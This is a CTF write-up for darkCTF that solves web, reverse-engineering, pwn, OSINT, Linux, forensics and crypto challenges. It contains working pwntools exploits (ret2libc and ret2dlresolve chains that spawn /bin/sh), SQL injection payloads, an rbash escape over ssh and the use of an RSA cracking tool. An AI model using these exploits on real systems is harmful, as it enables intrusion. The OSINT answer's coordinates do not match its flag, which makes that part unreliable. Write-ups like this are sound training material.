1 of 21

darkctf

Web

Simple SQL

Briefing:

Try to find username and password. Webiste: http://simplesql.darkarmy.xyz/.

In the source we see the comment .

Injecting a simple ?id=1 or 2=2 gives us the response Username : LOL Password : Try.

Trying ?id=2 or 2=2 gives us a difference response, Username : Try Password : another, so I tried a few more till at http://simplesql.darkarmy.xyz/?id=9%20or%202=2 you get the flag.

Flag:

darkCTF{it_is_very_easy_to_find}

Rev

helloworld

Briefing:

taking small Bites of Bytes File

looks hard to reverse, but really it just checks a funtion's output

Put a break on both checks
set the value of eax to 0 to pass them
get the flag

Flag:

darkCTF{4rgum3nts_are_v3ry_1mp0rt4nt!!!}

pwn

roprop

Briefing:

This is from the back Solar Designer times where you require rope to climb and get anything you want.

nc pwn.darkarmy.xyz 5002

from pwn import *

elf = context.binary = ELF('./roprop', checksec=False)
if args.REMOTE:
    libc = ELF('./libc-remote.so')
    p = remote('roprop.darkarmy.xyz', 5002)
else:
    libc = elf.libc
    p = process()


p.recvuntil('s.\n\n')

rop = ROP(elf)
rop.raw('A' * 88)
rop.puts(elf.got['puts'])
rop.raw(elf.sym['main'])

p.sendline(rop.chain())

leak = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leak: {hex(leak)}')


p.recvlines(2)

libc.address = leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

# ret2libc
rop = ROP(libc)
rop.raw('A' * 88)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)

p.sendline(rop.chain())
p.interactive()

newPAX

Briefing:

Even though Solar Designer gave you his times technique, you have to resolve(sort-out) yourself and go deeper. This time rope willn't let you have anything you want but you have to make a fake rope and get everything.
nc pwn.darkarmy.xyz 5001

super basic ret2dlresolve exploit

from pwn import *

elf = context.binary = ELF('./newPaX', checksec=False)

if args.REMOTE:
    p = remote('newpax.darkarmy.xyz', 5001)
else:
    p = process()
rop = ROP(elf)

# obviously a ret2dlresolve
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 52)
rop.read(0, dlresolve.data_addr, 100)
rop.ret2dlresolve(dlresolve)

p.sendline(rop.chain())

p.sendline(dlresolve.payload)                # now the read is called and we pass all the relevant structures in

p.interactive()

OSINT

Find Cell

I lost my phone while I was travelling back to home but I was able to get back my eNB ID, MCC and MNC could you help me catch the tower it was last found. Note: decimal value upto 1 digit

So firstly, after seeing what they have said about the eNB ID, MCC, and MNC, I decided to look up what they meant, so :

eNB ID : used to identify an EnodeB uniquely
MCC : mobile country code
MNC : mobile network code

You can distinguish which one is which by knowing that the MCC and MNC are both 3 digits so 81097 must be the eNB ID

We can use the MCC and MNC to find out that the cell tower is in the US, and that its provider is AT&T. Now we need to triangulate the cell tower so after a bit of googling I found a website called cellmapper.net, where you can specify the eNB ID, MNC and MCC, so finally you get the latlong coordinates by clicking on the location, which are 32.8464489 and -24.554806.

Flag:

Because we know that the briefing says the format is darkCTF{latitude, longtitude} to 1 decimal place we know that the flag is DarkCTF{38.4, 24.5}

The rounding is very odd

Dark Social Web

Briefing:

0xDarkArmy has 1 social account and DarkArmy uses the same name everywhere. Hint: The front page of internet

First off, running python3 sherlock 0xDarkArmy gives us hits on reddit, instagram and twitter, among others.

While nothing interesting was found on the twitter or instagram, there was a qr code posted on the reddit page, seen here

Scanning the qr code, we are directed to a .onion site, openable in tor. see here

At a first look it seems like a static template page. However navigating to /robots.txt we get half of the flag: darkctf{S0c1a1_D04k_

Opening up developer tools and going to the 'networks' tab, we can see that in the get request to the page, there is a custom HTTP header Flag: under Date. This contains the second half of the flag: _w3b_051n7}

Flag:

darkctf{S0c1a1_D04k_w3b_051n7}

Linux

Linux Starter

Briefing:

Don't Try to break this jail. ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 password : wolfie

Sshing in and running echo $SHELL shows us we have an rbash shell- that is, a restricted shell.

Googling how to bypass this I found you could add 'bash --noprofile' to the end of the ssh command.

So running ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 'bash --noprofile' gives us an unrestricted shell. From there, just cd imp and cat flag.txt to get the flag.

Flag:

darkCTF{h0pe_y0u_used_intended_w4y}

Find Me

Briefing:

Mr.Wolf was doing some work and he accidentally deleted the important file can you help him and read the file? ssh ctf@findme.darkarmy.xyz -p 10000 password: wolfie

Running ps aux to see the running processes showed us that the command tail -f /home/wolf1/pass was running at PID 10. However in the /home/wolf1 directory, this file was not to be found.

After googling how to view the contents of a background process I ran the command cat /proc/10/fd/* and got mysecondpassword123.

Since there was a wolf2 directory I figured this was the password for wolf2, so running su wolf2 and inputting this as the password means we are now wolf2. List the files and get the flag.

Flag:

darkCTF{w0ahh_n1c3_w0rk!!!}

forensics

Wolfie's Contact

Permalink

Briefing:

Wolfie is doing some illegal work with his friends find his contacts. File

Opening the file in autopsy, we can see some emails. In the headings of some, you could see parts of the flag.
Alternatively, this challenge could be done by opening the file in mousepad and ctrl + F searching for 'darkctf{'

Flag:

darkCTF{C0ntacts_4re_1mp0rtant}

Free Games

Permalink

Briefing:

Wolfie getting free games from somewhere. Find the full url to that game. Note: Use the same file provided in Wolfie's Contacts Flag Format: darkCTF{http://site} file

Using the same file from Wolfie's contacts, I searched for the string http:// in autopsy.

There were a few results but one was a .zip so I assumed this was the game.

Flag:

darkCTF{http://aries.dccircle34.com/realitydownloadgo/c4d37739ca3dc3ed2d4852395d5ed228/784b4647446e334c58556e5473326556422e624f612e51432e4a6472/2019/07/31/PencakSilat2_1.zip}

AW

Permalink

Briefing:

"Hello, hello, Can you hear me, as I scream your Flag! " file

Opening the file in sonic visualiser, you can see two audio streams. Seaparete the streams and then add a spectogram layer. Play around with the colour settings to see the flag more clearly.

Flag:

darkCTF{1_l0v3_5p3ctr3_fr0m_4l4n}

crypto

haXXor

you either know it or not take this and get your flag 5552415c2b3525105a4657071b3e0b5f494b034515

As the name suggests, it's XOR.

Flag:

darkCTF{kud0s_h4xx0r}

Pipe Rhyme

Yes, we cheesed it.

python3 RsaCtfTool.py -n 0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f -e 0x10001 --uncipher 0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886 --private

Flag:

darkCTF{4v0iD_us1ngg_p1_pr1mes}